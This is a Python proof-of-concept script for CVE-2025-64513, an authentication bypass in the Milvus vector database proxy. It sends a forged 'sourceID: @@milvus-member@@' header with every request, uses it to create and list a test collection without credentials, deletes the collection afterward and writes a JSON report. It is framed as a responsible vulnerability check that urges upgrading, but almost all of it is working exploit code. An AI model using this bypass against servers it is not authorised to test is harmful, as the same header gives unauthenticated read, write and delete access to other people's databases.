#!/usr/bin/env python3 # ============================================== # CVE-2025-64513 Responsible Test PoC + Report # Author: Blackash "B1ack4sh" # Target: Milvus Proxy[](http://host:19530) # ============================================== import requests import json import random import string import sys import datetime import base64 import urllib3 urllib3.disable_warnings() # === CONFIG === URL = "" # ← SET YOUR TARGET: http://milvus-proxy:19530 VERIFY_SSL = False TIMEOUT = 10 # Generate unique test name TEST_ID = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) COLLECTION_NAME = f"cve_2025_64513_test_{TEST_ID}" # Headers for bypass BYPASS_HEADER = {"sourceID": "@@milvus-member@@", "Content-Type": "application/json"} # Report storage REPORT = { "cve": "CVE-2025-64513", "timestamp": datetime.datetime.utcnow().isoformat() + "Z", "target": URL, "test_collection": COLLECTION_NAME, "steps": [], "vulnerable": False, "proof": {}, "cleanup": False } def log_step(step, result=None): entry = {"step": step, "result": result} REPORT["steps"].append(entry) print(f"[*] {step} → {result}") def save_report(): filename = f"report_cve_2025_64513_{TEST_ID}.json" with open(filename, "w") as f: json.dump(REPORT, f, indent=2) print(f"\nREPORT SAVED: {filename}\n") # === STEP 1: Check Version (Read-Only) === def check_version(): try: resp = requests.get(f"{URL}/api/v1/version", headers=BYPASS_HEADER, verify=VERIFY_SSL, timeout=TIMEOUT) if resp.status_code == 200: version = resp.json().get("version", "unknown") log_step("Version Check", f"Success (v{version})") return version else: log_step("Version Check", f"Failed (HTTP {resp.status_code})") return None except Exception as e: log_step("Version Check", f"Error: {e}") return None # === STEP 2: Create Test Collection === def create_test_collection(): payload = { "collection_name": COLLECTION_NAME, "schema": { "fields": [ {"name": "id", "type": "Int64", "is_primary_key": True}, {"name": "vector", "type": "FloatVector", "params": {"dim": 8}} ] } } try: resp = requests.post(f"{URL}/api/v1/collections", json=payload, headers=BYPASS_HEADER, verify=VERIFY_SSL, timeout=TIMEOUT) if resp.status_code == 200: log_step("Create Test Collection", f"Success: {COLLECTION_NAME}") REPORT["proof"]["collection_created"] = True return True else: log_step("Create Test Collection", f"Failed: {resp.text}") return False except Exception as e: log_step("Create Test Collection", f"Error: {e}") return False # === STEP 3: Verify Collection Exists === def verify_collection(): try: resp = requests.get(f"{URL}/api/v1/collections", headers=BYPASS_HEADER, verify=VERIFY_SSL, timeout=TIMEOUT) if resp.status_code == 200: collections = [c["collection_name"] for c in resp.json().get("collections", [])] if COLLECTION_NAME in collections: log_step("Verify Collection", f"Found: {COLLECTION_NAME}") return True log_step("Verify Collection", "Not found") return False except Exception as e: log_step("Verify Collection", f"Error: {e}") return False # === STEP 4: Clean Up === def delete_collection(): try: resp = requests.delete(f"{URL}/api/v1/collections/{COLLECTION_NAME}", headers=BYPASS_HEADER, verify=VERIFY_SSL, timeout=TIMEOUT) if resp.status_code == 200: log_step("Cleanup", f"Deleted: {COLLECTION_NAME}") REPORT["cleanup"] = True return True else: log_step("Cleanup", f"Failed: {resp.text}") return False except Exception as e: log_step("Cleanup", f"Error: {e}") return False # === MAIN === if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 poc_cve_2025_64513.py http://milvus-host:19530") sys.exit(1) URL = sys.argv[1].rstrip("/") REPORT["target"] = URL print(f"\nTARGET: {URL}") print(f"TEST COLLECTION: {COLLECTION_NAME}\n") version = check_version() if not version: print("Version check failed. Likely not vulnerable or unreachable.") save_report() sys.exit(1) created = create_test_collection() verified = verify_collection() if created else False REPORT["vulnerable"] = created and verified REPORT["proof"]["version"] = version # Cleanup if created: delete_collection() else: print("Skipping cleanup (nothing created)") # Final Verdict print("\n" + "="*50) if REPORT["vulnerable"]: print("VULNERABLE TO CVE-2025-64513") print("Upgrade to 2.4.24 / 2.5.21 / 2.6.5 IMMEDIATELY!") else: print("NOT VULNERABLE (or already patched)") print("="*50) save_report()